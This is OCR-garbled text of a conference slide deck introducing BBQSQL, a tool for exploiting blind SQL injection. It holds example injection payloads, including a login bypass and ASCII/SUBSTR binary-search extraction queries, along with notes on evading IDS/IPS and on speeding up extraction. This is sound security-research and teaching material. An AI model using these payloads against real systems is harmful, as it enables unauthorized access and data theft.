BBQSQL Ben Toews Scott Behrens (\J NEDHAPSIS Who are we? • Ben Toews o Security Consultant / Researcher at Neohapsis • Scott Behrens o Security Consultant / Researcher at Neohapsis (\J NEOHAPSIS Why are we here? • BBQSQL New dog, old trick ■ Exploits Blind SQL Injection New dog, new trick ■ Fast ■ Easy ■ Gets those hard to reach spots (\J NEDHAPSIS SQL What? • Structured Query Language (SQL) o Language for interacting with database • SQL Injection o Inject syntax into an application's SQL queries (\J NEDHAPSIS Basic SQL Injection Normal Case : UNAME = "mastahyeti" PASS = "s3cret" QUERY = "select * from users where pass=md5 ( f " + PASS + " f ) and uname= f "+ UNAME +" f " ; QUERY evaluates to: select * from users where pass=md5 ( 1 secret 1 ) and uname= 1 mastahyeti 1 (\J NEDHAPSIS Basic SQL Injection SQL Injection Case: UNAME = "pwned 1 or f l f = f l"; PASS = "pwned"; QUERY = "select * from users where pass=md5 ( f " + PASS + " f ) and uname= f "+UNAME + " f " ; QUERY evaluates to: select * from users where pass=md5 ( 1 pwned 1 ) and uname= 1 pwned f or f l f = f l f f\J NEDHAPSIS Blind SQL Injection • Still trying to alter SQL syntax • Dumping database • More complex SQL syntax (\J NEDHAPSIS Blind SQL Injection Blind SQL Injection Case: UNAME = " ! or (ASCI I ( SUBSTR ( SELECT user(), 1,1))>63) PASS = ""; QUERY = "select * from users where pass=md5 ( 1 "+PASS+" f ) and uname= 1 "+ UNAME +" f " ; QUERY evaluates to: select * from users where pass=md5 ( 1 1 ) and uname= ff or (ASCII (SUBSTR (SELECT user(), 1,1))>63) — 1 f\J NEOHAP5I5 Blind SQL Injection select * from users where pass=md5 ( 1 1 ) and uname= 1 1 or ( ASCII ( « char -> int SUBSTR( « slice string SELECT user () << current user ,1,1) « first char ) >63 « 63 = 1 ? 1 ) -- 1 << comment (\J NEDHAPSIS Blind SQL Injection • Binary (or other) search for each character • One character at a time • Time consuming (\J NEDHAPSIS Blind SQL Injection Lots of excellent tools out there o sqlmap, sqlninja, BSQL Hacker, the Mole, Havi j , ... Lots of great features A A A A A A -i ■ n good j ob guys . . . If these tools don 1 1 work o You end up writing a custom script, test, debug, test, debug. . . What if there was a way to simplify tricky Blind SQL Injection attacks... (\J NEDHAPSIS Images from http://www.freedigitalpriotos.net/ BBQSQL • Exploits Blind SQL Injection • For those hard to reach spots • Semi-automatic • Database agnostic • Versatile • Fast • Fast • Did we mention it is fast? (\J NEDHAPSIS BBQSQL : Use • Must provide the usual information o URL o HTTP Method o Headers o Cookies o Encoding methods o Redirect behavior o Files o HTTP Auth o Proxies o ... (\J NEDHAPSIS BBQSQL : Use • Provide two additional pieces o info o Specify where the injection goes o Specify what syntax we are injecting £\J NEOH BBQSQL : Use • The injection can go ANYWHERE: O url => "http : //google . com?vuln= '${ query } " O data => "user=foo&pass=$ { query } " O cookies => {' PHPSESSID ':' 123123 ',' F00 ':' BAR$ { query }' } • doesn't understand data doesn't care about your annoying: ■ serialization format ■ processes and rules ■ encodings (\J NEDHAPSIS BBQSQL : Use • The query specifies how to do binary search : O query => "' and ASCI I ( SUBSTR (( SELECT data FROM data LIMIT 1 OFFSET $ { row_index : 1 } ) , $ { char_index : 1 } , 1 ) ) $ { comparator : > } $ { char_val : } # " • Database agnostic • Doesn't care about your annoying: o SQL syntax o Charset limitations o IDS/IPS (\J NEDHAPSIS Demo? Images from http://gossipsucker.com/ BBQSQL : Speed • Concurrent HTTP requests • Multiple search algorithms o Binary search o Frequency based search (\J NEDHAPSIS BBQSQL : Speed • Concurrent HTTP requests • Multiple search algorithms o Binary search o Frequency based search (\J NEDHAPSIS BBQSQL : grequests grequests = gevent + requests (\J NEDHAPSIS BBQSQL : grequests grequests = gevent + requests (\J NEDHAPSIS BBQSQL : gevent "gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of the libevent event loop" -http : //gevent . org (\J NEDHAPSIS BBQSQL : gevent • Coroutine ~ function • You spawn many simultaneous coroutines • Only one runs at a time • When a coroutine encounters blocking (network 10) it yields and allows the next coroutine to run while it waits • This forms an event-loop • Functionally, it appears to act like threading (\J NEDHAPSIS BBQSQL : grequests grequests = gevent + requests (\J NEDHAPSIS BBQSQL : requests "HTTP For Humans" -docs .python- requests . org • Awesome HTTP API built on top of urllib3 in Python • Written/maintained by Kenneth Reitz o API designing badass (\J NEDHAPSIS BBQSQL : grequests grequests = gevent + requests (\J NEDHAPSIS BBQSQL : grequests Good Evented HTTP for Python (\J NEDHAPSIS BBQSQL : Speed • Concurrent HTTP requests • Multiple search algorithms o Binary search o Frequency based search (\J NEDHAPSIS BBQSQL : Binary Search 1 2 3 4 5 6 7 8 9 10 11 12 7 8 9 10 11 12 Case : O(log(n) ) (\J NEDHAPSIS BBQSQL : Speed • Concurrent HTTP requests • Multiple search algorithms o Binary search o Frequency based search (\J NEDHAPSIS BBQSQL : Linear Search (\J NEDHAPSIS BBQSQL : Frequency • Analysed lots of books, source code, CCs, SSNs :P • Most common characters are [ 1 1 , f e', T t T , f o f , T a'] • Most likely characters to follow 'e f are [' \ f r f , T n'] f\J NEDHAPSIS BBQSQL : Frequency • Very fast against non-entropic data: o English ■ -10 requests/character o Python ■ -8 requests/character o Credit card numbers ■ -5.5 requests/character • VS . binary search o English ■ -12 requests/character (\J NEDHAPSIS BBQSQL : UI UI is built using source from Social Engineering Toolkit (SET) o Thanks Dave (ReLlK) Kennedy! Input validation is performed on each configuration option in real time to prevent snafu O You don't have to wait till you type up a huge request on the CLI and find out your 600 char POST data is malformed! (\J NEDHAPSIS BBQSQL : UI • Configuration files can be imported and exported through UI or CLI o Uses ConfigParser so easy to work with • Can export attack results as CSV file (\J NEDHAPSIS Credits • Wikipedia (math is hard) • Neohapsis Labs • Image links are embedded in presentation ReLIK - SET engineer- tool kit/ https : //www. trustedsec . com/ downloads /social- (\J NEOHAPSIS Thanks Ben Toews - @mastahyeti Scott Behrens - @helloarbit Neohapsis ( . com) « Hiring << bonus4us BBQSQL github . com/neohapsis/bbqsql (\J NEOHAPSIS